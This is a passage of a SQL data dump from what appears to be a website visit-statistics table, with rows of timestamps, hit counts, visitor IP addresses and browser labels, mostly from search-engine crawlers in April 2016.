,'5.255.253.113','other'),(31835,1459684440,2,2,0,0,'217.69.133.221','other'),(31836,1459684441,1,1,0,0,'217.69.133.222','other'),(31837,1459684504,1,1,0,0,'217.69.133.233','other'),(31838,1459684606,1,1,0,0,'217.69.143.54','other'),(31839,1459684869,7,7,0,0,'5.9.151.22','other'),(31840,1459684989,2,2,0,0,'217.69.133.231','other'),(31841,1459685196,20,20,0,0,'130.193.50.34','other'),(31842,1459685243,1,1,0,0,'217.69.133.215','other'),(31843,1459685268,2,2,0,0,'5.255.253.113','other'),(31844,1459685664,1,1,0,0,'217.69.133.226','other'),(31845,1459685802,2,2,0,0,'217.69.133.228','other'),(31846,1459685924,1,1,0,0,'93.158.152.84','other'),(31847,1459685936,1,0,1,0,'66.249.64.233',''),(31848,1459685948,9,9,0,0,'141.8.132.105','other'),(31849,1459685977,5,5,0,0,'141.8.183.25','other'),(31850,1459686144,1,0,1,0,'66.249.64.228',''),(31851,1459686330,1,1,0,0,'217.69.133.69','other'),(31852,1459686692,23,23,0,0,'130.193.50.34','other'),(31853,1459686725,3,3,0,0,'5.255.253.113','other'),(31854,1459686951,1,1,0,0,'217.69.133.217','other'),(31855,1459686952,2,2,0,0,'217.69.133.85','other'),(31857,1459687017,1,0,1,0,'66.249.64.233',''),(31858,1459687138,1,0,1,0,'66.249.64.228',''),(31859,1459687330,1,1,0,0,'217.69.133.215','other'),(31860,1459687375,1,1,0,0,'217.69.133.225','other'),(31861,1459687538,1,0,1,0,'68.180.231.29',''),(31862,1459687729,1,1,0,0,'87.206.241.168','chrome'),(31863,1459687758,1,1,0,0,'180.76.15.23','other'),(31864,1459687809,1,1,0,0,'180.76.15.155','other'),(31865,1459688215,1,0,1,0,'66.249.64.233',''),(31866,1459688322,1,0,1,0,'66.249.64.223',''),(31867,1459688710,1,1,0,0,'217.69.133.4','other'),(31868,1459688734,1,1,0,0,'130.193.51.19','other'),(31869,1459688737,2,2,0,0,'5.255.253.113','other'),(31870,1459688745,1,1,0,0,'217.69.133.220','other'),(31871,1459688919,1,1,0,0,'66.249.64.150','other'),(31872,1459689181,7,7,0,0,'130.193.50.34','other'),(31873,1459689287,6,6,0,0,'141.8.132.105','other'),(31874,1459689301,1,1,0,0,'66.249.89.116','other'),(31875,1459689398,1,1,0,0,'141.8.183.25','other'),(31876,1459689911,1,1,0,0,'66.249.64.233','other'),(31877,1459690028,1,1,0,0,'217.69.133.228','other'),(31878,1459690335,1,1,0,0,'217.69.133.233','other'),(31879,1459690402,1,1,0,0,'217.69.133.222','other'),(31880,1459690561,1,1,0,0,'130.193.51.19','other'),(31881,1459691149,1,0,1,0,'66.249.64.233',''),(31882,1459691301,1,1,0,0,'217.69.133.224','other'),(31883,1459691302,1,1,0,0,'217.69.133.223','other'),(31884,1459691310,1,0,1,0,'68.180.231.29',''),(31885,1459691323,1,1,0,0,'217.69.133.227','other'),(31886,1459691324,1,1,0,0,'217.69.133.228','other'),(31887,1459691440,1,1,0,0,'141.8.132.105','other'),(31888,1459691610,1,1,0,0,'130.193.50.34','other'),(31889,1459691656,1,1,0,0,'217.69.133.236','other'),(31890,1459691735,1,1,0,0,'141.8.183.25','other'),(31891,1459691978,1,0,1,0,'66.249.64.228',''),(31892,1459692091,1,1,0,0,'40.78.146.128','other'),(31893,1459692502,3,0,3,0,'68.180.231.29',''),(31894,1459692592,3,3,0,0,'130.193.50.34','other'),(31895,1459692617,1,1,0,0,'217.69.133.240','other'),(31896,1459692720,1,1,0,0,'217.69.133.226','other'),(31898,1459692724,1,1,0,0,'217.69.133.221','other'),(31899,1459692859,1,1,0,0,'217.69.133.67','other'),(31900,1459692934,1,1,0,0,'217.69.133.218','other'),(31901,1459692991,1,1,0,0,'8.29.198.26','other'),(31902,1459693298,1,1,0,0,'40.77.167.67','other'),(31903,1459693304,2,0,2,0,'66.249.64.233',''),(31904,1459693441,1,1,0,0,'141.8.132.105','other'),(31905,1459693623,1,1,0,0,'180.76.15.29','other'),(31906,1459693885,3,3,0,0,'130.193.50.34','other'),(31907,1459693987,2,1,1,0,'66.249.64.228',''),(31908,1459694022,1,1,0,0,'66.249.64.162','other'),(31909,1459694291,1,0,1,0,'66.249.64.150',''),(31910,1459694413,3,0,3,0,'66.249.64.223',''),(31911,1459694512,1,1,0,0,'109.163.234.8','chrome'),(31912,1459694633,1,1,0,0,'40.77.167.67','other'),(31913,1459694948,3,3,0,0,'141.8.132.105','other'),(31914,1459695386,2,0,2,0,'66.249.64.233',''),(31915,1459695594,1,1,0,0,'130.193.50.34','other'),(31916,1459695687,1,0,1,0,'66.249.64.223',''),(31917,1459695806,1,1,0,0,'217.69.133.227','other'),(31918,1459695828,1,0,1,0,'66.249.64.228',''),(31919,1459696093,1,1,0,0,'217.69.133.232','other'),(31920,1459696117,1,1,0,0,'141.8.183.25','other'),(31921,1459696874,1,1,0,0,'217.69.133.239','other'),(31922,1459696875,1,1,0,0,'217.69.133.236','other'),(31923,1459696966,1,1,0,0,'37.55.227.101','firefox'),(31924,1459697137,1,0,1,0,'68.180.231.29',''),(31925,1459697165,1,1,0,0,'130.193.50.34','other'),(31926,1459697248,1,0,1,0,'68.180.229.103',''),(31927,1459697455,1,1,0,0,'217.69.133.231','other'),(31929,1459697491,1,0,1,0,'66.249.64.228',''),(31930,1459697700,1,1,0,0,'217.69.133.219','other'),(31931,1459697720,1,0,1,0,'66.249.64.156',''),(31932,1459697776,2,0,2,0,'66.249.64.223',''),(31933,1459697793,1,1,0,0,'217.69.133.70','other'),(31935,1459697881,1,1,0,0,'141.8.132.101','other'),(31936,1459697929,1,0,1,0,'66.249.64.162',''),(31937,1459698091,1,1,0,0,'217.69.133.67','other'),(31938,1459698128,1,0,1,0,'68.180.231.29',''),(31939,1459698378,1,1,0,0,'217.69.133.226','other'),(31940,1459698549,2,2,0,0,'130.193.50.34','other'),(31941,1459698632,4,4,0,0,'178.63.86.11','other'),(31942,1459699483,1,1,0,0,'217.69.133.216','other'),(31943,1459699532,4,4,0,0,'130.193.50.34','other'),(31944,1459699541,1,1,0,0,'66.249.89.118','other'),(31945,1459699712,2,2,0,0,'141.8.183.25','other'),(31946,1459700890,1,0,1,0,'66.249.64.228',''),(31947,1459700954,1,1,0,0,'141.8.183.25','other'),(31948,1459701248,1,1,0,0,'217.69.133.231','other'),(31950,1459701251,1,1,0,0,'217.69.133.223','other'),(31951,1459701253,1,1,0,0,'217.69.133.226','other'),(31952,1459701316,1,0,1,0,'68.180.231.29',''),(31953,1459701619,1,0,1,0,'66.249.64.233',''),(31954,1459701777,1,1,0,0,'217.69.133.233','other'),(31955,1459701778,2,2,0,0,'217.69.133.227','other'),(31956,1459701789,1,1,0,0,'130.193.50.34','other'),(31957,1459702314,1,1,0,0,'217.69.133.221','other'),(31958,1459702344,1,1,0,0,'157.55.39.254','other'),(31959,1459702517,1,1,0,0,'141.8.142.58','other'),(31960,1459702615,1,1,0,0,'66.249.64.228','other'),(31961,1459702832,1,1,0,0,'91.196.178.100','chrome'),(31962,1459702876,29,29,0,0,'130.193.50.34','other'),(31963,1459702877,1,1,0,0,'130.193.51.19','other'),(31965,1459703031,27,27,0,0,'141.8.132.105','other'),(31966,1459703034,5,5,0,0,'5.255.253.113','other'),(31967,1459703036,6,6,0,0,'130.193.51.83','other'),(31968,1459703042,5,5,0,0,'141.8.183.25','other'),(31969,1459703060,1,1,0,0,'217.69.133.219','other'),(31970,1459703097,1,1,0,0,'217.69.133.229','other'),(31971,1459703098,1,1,0,0,'217.69.133.227','other'),(31972,1459703117,1,1,0,0,'217.69.133.69','other'),(31973,1459703283,1,1,0,0,'217.69.133.239','other'),(31974,1459703285,1,1,0,0,'217.69.133.236','other'),(31975,1459703800,1,1,0,0,'8.29.198.25','other'),(31976,1459703852,1,1,0,0,'217.69.133.67','other'),(31977,1459703853,1,1,0,0,'217.69.133.84','other'),(31978,1459704074,2,2,0,0,'217.69.133.68','other'),(31979,1459704210,1,1,0,0,'66.249.64.162','other'),(31980,1459704409,1,0,1,0,'66.249.64.233',''),(31981,1459704455,2,0,2,0,'68.180.231.29',''),(31982,1459704515,1,1,0,0,'130.193.50.34','other'),(31983,1459704525,2,0,2,0,'66.249.64.228',''),(31984,1459704749,4,4,0,0,'141.8.183.25','other'),(31985,1459704970,13,13,0,0,'141.8.132.105','other'),(31986,1459705208,1,1,0,0,'217.69.133.216','other'),(31987,1459705635,14,14,0,0,'130.193.50.34','other'),(31988,1459705641,4,4,0,0,'130.193.51.83','other'),(31989,1459705642,7,7,0,0,'5.255.253.113','other'),(31990,1459705650,4,4,0,0,'141.8.183.25','other'),(31991,1459705842,2,0,2,0,'66.249.64.228',''),(31992,1459705915,1,1,0,0,'217.69.133.223','other'),(31993,1459705991,1,0,1,0,'66.249.64.233',''),(31994,1459706696,2,1,1,0,'66.249.64.233',''),(31995,1459706766,1,0,1,0,'66.249.64.156',''),(31996,1459706785,1,1,0,0,'217.69.133.232','other'),(31997,1459706786,1,1,0,0,'217.69.133.69','other'),(31998,1459706966,1,1,0,0,'217.69.136.203','other'),(31999,1459706967,1,1,0,0,'217.69.136.207','other'),(32000,1459707099,1,0,1,0,'66.249.64.228',''),(32001,1459707214,2,2,0,0,'217.69.133.68','other'),(32003,1459707215,1,1,0,0,'217.69.133.220','other'),(32004,1459707246,1,1,0,0,'217.69.133.228','other'),(32005,1459707382,1,0,1,0,'66.249.64.162',''),(32006,1459707384,2,0,2,0,'66.249.64.223',''),(32007,1459707482,1,1,0,0,'141.8.183.25','other'),(32008,1459707920,1,1,0,0,'217.69.133.226','other'),(32009,1459708081,1,1,0,0,'217.69.133.237','other'),(32010,1459708082,2,2,0,0,'217.69.133.240','other'),(32012,1459708115,1,0,1,0,'68.180.231.29',''),(32013,1459708301,1,1,0,0,'217.69.133.227','other'),(32014,1459708302,3,3,0,0,'217.69.133.231','other'),(32015,1459708304,2,2,0,0,'217.69.133.233','other'),(32016,1459708947,1,1,0,0,'217.69.133.236','other'),(32017,1459709089,1,1,0,0,'217.69.133.218','other'),(32018,1459709090,1,1,0,0,'217.69.133.85','other'),(32020,1459709373,1,1,0,0,'62.210.215.100','chrome'),(32021,1459709449,2,0,2,0,'66.249.64.223',''),(32022,1459709623,1,0,1,0,'66.249.64.228',''),(32023,1459709765,1,0,1,0,'66.249.64.233',''),(32024,1459709964,1,1,0,0,'130.193.50.34','other'),(32025,1459710074,1,1,0,0,'217.69.133.84','other'),(32026,1459710126,1,1,0,0,'66.249.93.67','chrome'),(32027,1459710563,2,0,2,0,'66.249.64.223',''),(32028,1459710842,1,1,0,0,'66.249.89.118','other'),(32029,1459711054,2,0,2,0,'66.249.64.228',''),(32030,1459711084,2,0,2,0,'66.249.64.233',''),(32031,1459711528,1,1,0,0,'217.69.133.225','other'),(32032,1459711604,2,0,2,0,'66.249.64.223',''),(32033,1459711806,2,2,0,0,'130.193.50.34','other'),(32034,1459712011,4,1,3,0,'66.249.64.228',''),(32035,1459712798,2,2,0,0,'217.69.133.227','other'),(32037,1459712799,1,1,0,0,'217.69.133.231','other'),(32039,1459712811,1,1,0,0,'217.69.133.222','other'),(32040,1459712893,3,0,3,0,'66.249.64.223',''),(32041,1459713051,1,1,0,0,'130.180.208.191','chrome'),(32042,1459713080,1,1,0,0,'217.69.133.233','other'),(32043,1459713082,1,1,0,0,'217.69.133.228','other'),(32044,1459713095,1,0,1,0,'66.249.64.228',''),(32045,1459713239,2,0,2,0,'66.249.64.233',''),(32046,1459713443,3,3,0,0,'130.193.50.34','other'),(32047,1459713444,4,4,0,0,'5.255.253.113','other'),(32048,1459713445,2,2,0,0,'141.8.132.105','other'),(32050,1459713448,1,1,0,0,'130.193.51.83','other'),(32052,1459713470,3,3,0,0,'69.30.215.106','other'),(32053,1459713745,1,1,0,0,'217.69.133.226','other'),(32054,1459714207,1,1,0,0,'217.69.133.233','other'),(32055,1459714503,1,1,0,0,'217.69.133.240','other'),(32056,1459714504,1,1,0,0,'217.69.133.70','other'),(32057,1459714505,1,1,0,0,'217.69.133.238','other'),(32058,1459714506,1,1,0,0,'217.69.133.237','other'),(32059,1459714549,2,2,0,0,'66.249.64.162','other'),(32060,1459714564,2,0,2,0,'66.249.64.233',''),(32061,1459714616,3,0,3,0,'66.249.64.228',''),(32062,1459714619,3,0,3,0,'66.249.64.223',''),(32063,1459714672,1,1,0,0,'8.29.198.25','other'),(32064,1459714740,1,1,0,0,'164.132.161.15','other'),(32065,1459714832,1,1,0,0,'130.193.50.34','other'),(32066,1459714846,1,1,0,0,'141.8.183.25','other'),(32067,1459715205,1,1,0,0,'157.55.39.36','other'),(32068,1459715267,3,3,0,0,'217.69.133.225','other'),(32069,1459715268,1,1,0,0,'217.69.133.68','other'),(32070,1459715449,1,1,0,0,'91.196.178.166','firefox'),(32071,1459715577,1,1,0,0,'178.94.172.40','chrome'),(32072,1459716170,1,1,0,0,'217.69.133.217','other'),(32073,1459716171,1,1,0,0,'217.69.133.216','other'),(32074,1459716273,1,1,0,0,'141.8.132.105','other'),(32075,1459716286,1,1,0,0,'51.255.65.61','other'),(32076,1459716322,1,1,0,0,'141.8.142.61','other'),(32077,1459716435,3,0,3,0,'66.249.64.233',''),(32078,1459716540,1,0,1,0,'66.249.64.228',''),(32079,1459716634,2,0,2,0,'66.249.64.223',''),(32080,1459716875,4,4,0,0,'130.193.50.34','other'),(32081,1459717055,1,0,1,0,'68.180.229.103',''),(32082,1459717143,1,1,0,0,'217.69.133.5','other'),(32083,1459717408,1,1,0,0,'37.9.122.201','other'),(32084,1459717721,1,1,0,0,'93.158.152.202','other'),(32085,1459717725,1,1,0,0,'93.158.152.203','other'),(32086,1459717759,1,1,0,0,'66.249.64.156','other'),(32087,1459717773,2,0,2,0,'66.249.64.150',''),(32088,1459717840,1,1,0,0,'130.193.50.34','other'),(32089,1459717901,1,1,0,0,'217.69.133.229','other'),(32090,1459717902,1,1,0,0,'217.69.133.233','other'),(32092,1459717903,2,2,0,0,'217.69.133.232','other'),(32093,1459718023,2,1,1,0,'66.249.64.228',''),(32094,1459718391,1,1,0,0,'217.69.133.220','other'),(32095,1459718558,1,1,0,0,'130.193.50.201','other'),(32096,1459718657,2,0,2,0,'66.249.64.233',''),(32097,1459718777,1,1,0,0,'217.69.133.69','other'),(32098,1459718831,1,0,1,0,'68.180.231.29',''),(32099,1459718936,2,2,0,0,'217.69.133.234','other'),(32100,1459718946,1,1,0,0,'51.255.65.44','other'),(32101,1459719098,3,3,0,0,'130.193.50.34','other'),(32102,1459719193,1,0,1,0,'66.249.64.223',''),(32103,1459719231,3,0,3,0,'66.249.64.228',''),(32104,1459719334,2,2,0,0,'178.154.189.202','other'),(32105,1459719623,1,1,0,0,'217.69.133.229','other'),(32106,1459719917,1,1,0,0,'217.69.133.240','other'),(32107,1459719918,1,1,0,0,'217.69.133.235','other'),(32108,1459720118,4,4,0,0,'130.193.50.34','other'),(32109,1459720505,2,2,0,0,'217.69.133.219','other'),(32110,1459720659,2,2,0,0,'217.69.133.221','other'),(32111,1459720734,2,2,0,0,'141.8.132.105','other'),(32112,1459721056,3,3,0,0,'130.193.50.34','other'),(32113,1459721337,2,1,1,0,'66.249.64.233',''),(32114,1459721613,2,2,0,0,'217.69.133.217','other'),(32115,1459721615,1,1,0,0,'217.69.133.84','other'),(32116,1459721832,1,1,0,0,'66.249.89.116','other'),(32117,1459721892,2,0,2,0,'68.180.231.29',''),(32118,1459722236,1,0,1,0,'66.249.64.223',''),(32119,1459722493,3,3,0,0,'130.193.50.34','other'),(32120,1459722495,1,0,1,0,'66.249.64.228',''),(32121,1459722988,1,1,0,0,'85.14.244.114','other'),(32122,1459722989,3,3,0,0,'193.111.140.153','other'),(32123,1459723416,1,1,0,0,'130.193.50.34','other'),(32124,1459723620,2,0,2,0,'66.249.64.228',''),(32125,1459723753,1,1,0,0,'217.69.133.229','other'),(32126,1459723793,1,1,0,0,'141.8.183.25','other'),(32127,1459723854,1,1,0,0,'141.8.132.105','other'),(32128,1459724110,2,2,0,0,'217.69.133.226','other'),(32129,1459724172,1,0,1,0,'68.180.231.29',''),(32130,1459724260,1,1,0,0,'217.69.133.230','other'),(32131,1459724608,1,1,0,0,'66.249.64.233','other'),(32132,1459724678,1,0,1,0,'68.180.229.103',''),(32133,1459725436,1,1,0,0,'141.8.132.105','other'),(32134,1459725506,1,1,0,0,'8.29.198.26','other'),(32135,1459725571,1,1,0,0,'217.69.133.231','other'),(32136,1459725665,1,0,1,0,'66.249.64.223',''),(32137,1459725764,1,1,0,0,'217.69.133.239','other'),(32138,1459725926,3,3,0,0,'130.193.50.34','other'),(32139,1459726349,1,1,0,0,'217.69.133.224','other'),(32140,1459726377,1,1,0,0,'180.76.15.30','other'),(32141,1459726552,2,2,0,0,'217.69.133.215','other'),(32142,1459727070,1,0,1,0,'66.249.64.96',''),(32143,1459727546,2,0,2,0,'66.249.64.228',''),(32144,1459727568,1,1,0,0,'217.69.133.217','other'),(32145,1459727699,1,0,1,0,'68.180.231.29',''),(32146,1459727825,1,1,0,0,'157.55.39.103','other'),(32147,1459727873,1,1,0,0,'217.69.133.84','other'),(32148,1459727874,1,1,0,0,'217.69.133.215','other'),(32150,1459728150,1,1,0,0,'217.69.133.223','other'),(32152,1459728151,1,1,0,0,'217.69.133.68','other'),(32154,1459728428,1,0,1,0,'66.249.64.150',''),(32155,1459728683,1,1,0,0,'141.8.132.105','other'),(32156,1459729014,3,0,3,0,'66.249.64.223',''),(32157,1459729155,2,2,0,0,'217.69.133.228','other'),(32159,1459729225,2,0,2,0,'66.249.64.228',''),(32160,1459729412,1,1,0,0,'217.69.133.70','other'),(32161,1459729413,1,1,0,0,'217.69.133.235','other'),(32162,1459729426,1,0,1,0,'66.249.64.106',''),(32163,1459729567,1,1,0,0,'5.255.253.113','other'),(32164,1459729595,1,1,0,0,'217.69.133.68','other'),(32166,1459729714,1,1,0,0,'217.69.133.230','other'),(32167,1459729715,1,1,0,0,'217.69.133.227','other'),(32168,1459730552,2,0,2,0,'66.249.64.233',''),(32169,1459730585,1,1,0,0,'217.69.133.226','other'),(32170,1459730586,1,1,0,0,'217.69.133.225','other'),(32171,1459730587,1,1,0,0,'217.69.133.68','other'),(32172,1459730747,1,0,1,0,'66.249.64.228',''),(32173,1459730882,1,0,1,0,'66.249.64.223',''),(32174,1459731105,1,1,0,0,'217.69.133.233','other'),(32175,1459731127,1,0,1,0,'68.180.231.29',''),(32176,1459731491,1,1,0,0,'217.69.133.239','other'),(32177,1459731568,1,1,0,0,'37.52.216.65','other'),(32178,1459732079,1,1,0,0,'217.69.133.215','other'),(32179,1459732274,1,1,0,0,'180.76.15.21','other'),(32180,1459732381,1,1,0,0,'66.249.89.114','other'),(32181,1459732514,1,0,1,0,'66.249.64.223',''),(32182,1459732627,1,1,0,0,'207.46.13.142','other'),(32183,1459733272,1,0,1,0,'66.249.64.228',''),(32184,1459733637,1,1,0,0,'130.193.50.34','other'),(32185,1459733740,1,1,0,0,'217.69.133.216','other'),(32186,1459734217,1,1,0,0,'217.69.133.224','other'),(32187,1459734266,2,2,0,0,'141.8.132.105','other'),(32188,1459734394,3,0,3,0,'66.249.64.228',''),(32189,1459734448,1,0,1,0,'68.180.231.29',''),(32190,1459734526,1,0,1,0,'66.249.64.156',''),(32191,1459734676,1,0,1,0,'66.249.64.223',''),(32192,1459734815,1,1,0,0,'217.69.133.230','other'),(32193,1459734817,1,1,0,0,'217.69.133.233','other'),(32194,1459735097,4,4,0,0,'130.193.50.34','other'),(32195,1459735235,1,1,0,0,'217.69.133.68','other'),(32196,1459735250,1,1,0,0,'217.69.133.234','other'),(32197,1459735584,1,1,0,0,'217.69.133.232','other'),(32198,1459735692,1,0,1,0,'68.180.231.29',''),(32199,1459735801,1,1,0,0,'195.154.146.225','msie'),(32200,1459735941,1,1,0,0,'141.8.183.25','other'),(32201,1459736022,1,1,0,0,'151.80.31.177','other'),(32202,1459736084,2,2,0,0,'217.69.133.223','other'),(32203,1459736085,1,1,0,0,'217.69.133.225','other'),(32204,1459736086,1,1,0,0,'217.69.133.222','other'),(32205,1459736164,3,0,3,0,'66.249.64.223',''),(32206,1459736262,1,1,0,0,'217.69.133.229','other'),(32207,1459736366,1,1,0,0,'8.29.198.26','other'),(32208,1459736448,1,1,0,0,'141.8.132.105','other'),(32209,1459736512,1,1,0,0,'217.69.133.235','other'),(32210,1459736568,20,20,0,0,'91.209.51.22','other'),(32211,1459736598,1,1,0,0,'164.132.161.4','other'),(32212,1459736618,1,1,0,0,'157.55.39.36','other'),(32213,1459736777,3,3,0,0,'130.193.50.34','other'),(32214,1459736797,2,0,2,0,'68.180.231.29',''),(32215,1459737006,1,1,0,0,'66.249.64.162','other'),(32216,1459737208,1,1,0,0,'66.249.64.156','other'),(32217,1459737220,1,1,0,0,'217.69.133.228','other'),(32218,1459737242,1,1,0,0,'217.69.133.231','other'),(32219,1459737538,8,8,0,0,'91.209.51.22','other'),(32220,1459737750,1,1,0,0,'217.69.133.68','other'),(32221,1459737885,4,0,4,0,'66.249.64.223',''),(32222,1459737900,2,0,2,0,'66.249.64.233',''),(32223,1459738134,1,1,0,0,'217.69.133.218','other'),(32224,1459738156,1,1,0,0,'130.193.50.34','other'),(32225,1459738177,1,0,1,0,'66.249.64.162',''),(32226,1459738332,1,0,1,0,'68.180.229.103',''),(32227,1459738417,1,0,1,0,'66.249.64.150',''),(32228,1459738683,8,8,0,0,'91.209.51.22','other'),(32229,1459739261,5,5,0,0,'130.193.50.34','other'),(32230,1459739290,1,0,1,0,'66.249.64.156',''),(32231,1459739297,1,0,1,0,'66.249.64.223',''),(32232,1459739519,1,1,0,0,'51.255.65.49','other'),(32233,1459739533,3,3,0,0,'141.8.132.105','other'),(32234,1459739553,1,1,0,0,'130.193.51.19','other'),(32235,1459739595,1,1,0,0,'217.69.133.224','other'),(32236,1459739654,1,1,0,0,'62.210.215.100','chrome'),(32237,1459739664,3,0,3,0,'66.249.64.228',''),(32238,1459739890,1,1,0,0,'51.255.65.35','other'),(32239,1459740005,1,0,1,0,'66.249.64.233',''),(32240,1459740046,1,1,0,0,'95.134.221.41','chrome'),(32241,1459740131,7,7,0,0,'141.8.183.25','other'),(32242,1459740139,2,2,0,0,'5.255.253.113','other'),(32243,1459740145,1,1,0,0,'141.8.142.61','other'),(32244,1459740507,1,1,0,0,'217.69.133.231','other'),(32246,1459740709,1,1,0,0,'164.132.161.89','other'),(32247,1459740710,1,1,0,0,'65.55.217.54','msie'),(32248,1459740874,3,3,0,0,'141.8.132.105','other'),(32249,1459740877,5,5,0,0,'130.193.50.34','other'),(32250,1459740936,1,1,0,0,'217.69.133.223','other'),(32251,1459740937,1,1,0,0,'217.69.133.234','other'),(32252,1459741348,1,1,0,0,'217.69.133.232','other'),(32253,1459741455,1,0,1,0,'66.249.64.233',''),(32254,1459741641,1,0,1,0,'66.249.64.96',''),(32255,1459741652,1,0,1,0,'66.249.64.101',''),(32256,1459741709,1,0,1,0,'66.249.64.85',''),(32257,1459741775,3,3,0,0,'141.8.183.25','other'),(32258,1459741779,13,13,0,0,'130.193.50.34','other'),(32259,1459741780,58,58,0,0,'5.9.89.170','other'),(32260,1459741789,1,1,0,0,'217.69.133.225','other'),(32262,1459741806,2,2,0,0,'141.8.132.105','other'),(32263,1459741819,1,1,0,0,'141.8.142.67','other'),(32264,1459741828,1,1,0,0,'217.69.133.227','other'),(32265,1459741846,5,5,0,0,'5.255.253.113','other'),(32266,1459741848,1,1,0,0,'66.249.64.106','other'),(32267,1459741850,1,1,0,0,'130.193.51.83','other'),(32268,1459741977,1,0,1,0,'68.180.231.29',''),(32269,1459741988,1,1,0,0,'164.132.161.65','other'),(32270,1459742014,1,1,0,0,'217.69.133.240','other'),(32272,1459742329,1,1,0,0,'217.69.133.232','other'),(32273,1459742471,1,1,0,0,'212.22.195.15','firefox'),(32274,1459742751,1,1,0,0,'164.132.161.24','other'),(32275,1459743277,1,1,0,0,'217.69.133.220','other'),(32276,1459743278,1,1,0,0,'217.69.133.68','other'),(32277,1459743325,1,0,1,0,'66.249.64.233',''),(32278,1459743344,3,0,3,0,'66.249.64.228',''),(32279,1459743356,6,0,6,0,'66.249.64.223',''),(32280,1459743394,1,1,0,0,'119.235.52.219','chrome'),(32281,1459743498,1,1,0,0,'217.69.133.215','other'),(32282,1459743712,2,2,0,0,'130.193.50.34','other'),(32283,1459743716,1,1,0,0,'141.8.132.105','other'),(32284,1459743944,1,0,1,0,'68.180.231.29',''),(32285,1459744141,1,1,0,0,'157.55.39.36','other'),(32286,1459744275,1,1,0,0,'157.55.39.139','other'),(32287,1459744291,2,0,2,0,'66.249.64.228',''),(32288,1459744459,2,2,0,0,'217.69.133.67','other'),(32289,1459744830,3,0,3,0,'66.249.64.233',''),(32290,1459744857,1,1,0,0,'180.76.15.147','other'),(32291,1459744929,1,1,0,0,'217.69.133.215','other'),(32292,1459744930,1,1,0,0,'217.69.133.84','other'),(32294,1459744954,1,0,1,0,'68.180.231.29',''),(32295,1459744966,2,1,1,0,'66.249.64.228',''),(32296,1459745074,1,0,1,0,'66.249.64.156',''),(32297,1459745091,1,1,0,0,'217.69.133.224','other'),(32298,1459745302,1,1,0,0,'51.255.65.65','other'),(32299,1459745917,2,2,0,0,'217.69.133.238','other'),(32300,1459745979,1,1,0,0,'141.8.132.105','other'),(32301,1459746249,1,1,0,0,'66.249.64.223','other'),(32302,1459746278,1,1,0,0,'157.55.39.103','other'),(32303,1459746452,1,1,0,0,'217.69.133.223','other'),(32304,1459746604,1,0,1,0,'66.249.64.233',''),(32305,1459747002,1,1,0,0,'217.69.133.228','other'),(32306,1459747004,1,1,0,0,'217.69.133.233','other'),(32308,1459747014,1,1,0,0,'217.69.133.230','other'),(32309,1459747015,1,1,0,0,'217.69.133.231','other'),(32311,1459747183,1,1,0,0,'8.29.198.26','other'),(32312,1459747197,1,1,0,0,'65.55.218.169','msie'),(32313,1459747202,1,1,0,0,'51.255.65.95','other'),(32314,1459747330,1,1,0,0,'217.69.133.220','other'),(32315,1459747619,1,1,0,0,'141.8.183.25','other'),(32316,1459747740,1,1,0,0,'151.80.31.158','other'),(32317,1459747781,1,1,0,0,'217.69.133.235','other'),(32318,1459748172,1,1,0,0,'217.69.133.227','other'),(32320,1459748481,2,2,0,0,'109.173.125.227','chrome'),(32321,1459748553,2,0,2,0,'66.249.64.233',''),(32322,1459748785,1,1,0,0,'217.69.133.223','other'),(32323,1459748874,1,1,0,0,'130.193.50.34','other'),(32324,1459748889,1,1,0,0,'141.8.132.105','other'),(32325,1459749253,1,1,0,0,'66.102.9.86','chrome'),(32326,1459749317,1,1,0,0,'51.255.65.94','other'),(32327,1459749371,1,1,0,0,'66.249.89.114','other'),(32328,1459749464,1,1,0,0,'91.196.178.70','firefox'),(32329,1459749474,1,1,0,0,'5.255.253.113','other'),(32330,1459749570,1,1,0,0,'91.196.178.69','chrome'),(32331,1459749579,1,1,0,0,'91.196.178.131','firefox'),(32332,1459749657,3,3,0,0,'217.69.133.217','other'),(32333,1459749839,1,1,0,0,'46.200.234.167','chrome'),(32334,1459749989,1,0,1,0,'68.180.231.29',''),(32335,1459749995,1,0,1,0,'66.249.64.150',''),(32336,1459750128,1,1,0,0,'151.80.31.108','other'),(32337,1459750148,2,2,0,0,'130.193.50.34','other'),(32338,1459750235,2,0,2,0,'66.249.64.228',''),(32339,1459750435,1,1,0,0,'217.69.133.218','other'),(32340,1459750641,1,0,1,0,'66.249.64.223',''),(32341,1459751205,1,1,0,0,'141.8.132.105','other'),(32342,1459751538,1,1,0,0,'91.196.178.69','firefox'),(32343,1459751544,2,2,0,0,'136.243.5.87','other'),(32344,1459751564,4,4,0,0,'130.193.50.34','other'),(32345,1459751714,1,1,0,0,'217.69.136.207','other'),(32346,1459751777,1,1,0,0,'178.95.246.136','firefox'),(32347,1459751827,1,1,0,0,'217.69.133.225','other'),(32348,1459751828,1,1,0,0,'217.69.133.68','other'),(32349,1459751850,1,1,0,0,'217.69.133.233','other'),(32350,1459751851,1,1,0,0,'217.69.133.232','other'),(32351,1459751955,1,0,1,0,'68.180.229.103',''),(32352,1459752077,4,0,4,0,'66.249.64.223',''),(32353,1459752185,1,1,0,0,'5.255.253.113','other'),(32354,1459752203,1,1,0,0,'164.132.161.73','other'),(32355,1459752597,2,0,2,0,'66.249.64.228',''),(32356,1459752686,1,1,0,0,'217.69.133.236','other'),(32357,1459752687,1,1,0,0,'217.69.133.238','other'),(32358,1459752721,1,1,0,0,'91.196.178.40','firefox'),(32359,1459752775,1,1,0,0,'217.69.133.69','other'),(32361,1459752776,1,1,0,0,'217.69.133.230','other'),(32363,1459752931,1,1,0,0,'217.69.133.68','other'),(32364,1459752932,2,2,0,0,'217.69.133.223','other'),(32365,1459752985,1,1,0,0,'91.196.178.69','chrome'),(32366,1459753114,2,0,2,0,'66.249.64.233',''),(32367,1459753285,1,1,0,0,'130.180.219.240','chrome'),(32368,1459753321,1,1,0,0,'141.8.132.105','other'),(32369,1459753576,2,0,2,0,'66.249.64.223',''),(32370,1459753720,1,1,0,0,'217.69.133.230','other'),(32371,1459753721,1,1,0,0,'217.69.133.233','other'),(32372,1459753811,1,1,0,0,'5.255.253.113','other'),(32373,1459754151,3,3,0,0,'91.196.178.69','chrome'),(32374,1459754206,1,1,0,0,'92.112.125.249','chrome'),(32375,1459754381,2,2,0,0,'130.193.50.34','other'),(32376,1459754637,1,1,0,0,'141.8.183.25','other'),(32377,1459754892,1,1,0,0,'51.255.65.55','other'),(32378,1459754957,1,1,0,0,'217.69.133.217','other'),(32379,1459755051,1,1,0,0,'217.69.133.218','other'),(32380,1459755129,2,0,2,0,'66.249.64.233',''),(32381,1459755785,1,0,1,0,'66.249.64.223',''),(32382,1459755801